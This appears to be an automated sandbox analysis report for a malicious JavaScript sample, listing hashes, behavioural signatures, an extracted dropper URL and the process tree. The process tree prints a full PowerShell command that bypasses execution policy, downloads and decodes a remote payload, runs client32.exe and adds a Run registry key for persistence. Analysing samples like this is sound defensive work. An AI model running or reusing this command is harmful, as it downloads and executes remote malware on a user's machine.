Analysis
-
max time kernel
117s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
29-08-2023 08:16
Static task
static1
Behavioral task
behavioral1
Sample
139613961396.js
Resource
win7-20230712-en
windows7-x64
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
139613961396.js
Resource
win10v2004-20230703-en
windows10-2004-x64
10 signatures
150 seconds
General
-
Target
139613961396.js
-
Size
3KB
-
MD5
7888817de0e288f6ce7ab1c794dfbf58
-
SHA1
a9c9286b4e18e211b020076da3f1304c909cc1a6
-
SHA256
b20cae48e98bb3cd42241b104a8a99326e462c64c4d46ec96075dcf77460a7f1
-
SHA512
8417cd4074718c3e56e0261d8fd9c2b33f135262be2acb57966e5dcc41ec36921019c3d40e9df40f25d2f9a41276bd436487cb629b7fab6e5102370330e8c2d2
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://instalfrio.cl/destination.txt
exe.dropper
http://instalfrio.cl/destination.txt
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 1492 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1492 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1492 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2132 wrote to memory of 1492 2132 wscript.exe 28 PID 2132 wrote to memory of 1492 2132 wscript.exe 28 PID 2132 wrote to memory of 1492 2132 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\139613961396.js1⤵
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C "$u='http://instalfrio.cl/destination.txt';$6=(New-Object System.Net.WebClient).DownloadString($u);$a=[System.Convert]::FromBase64String($6);$d=[System.Environment]::GetFolderPath('ApplicationData')+'\D';if (!(Test-Path $d -PathType Container)) { New-Item -Path $d -ItemType Directory };$p=Join-Path $d 'p.zip';[System.IO.File]::WriteAllBytes($p,$a);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$d)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $d 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$s=$d+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='X';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1492
-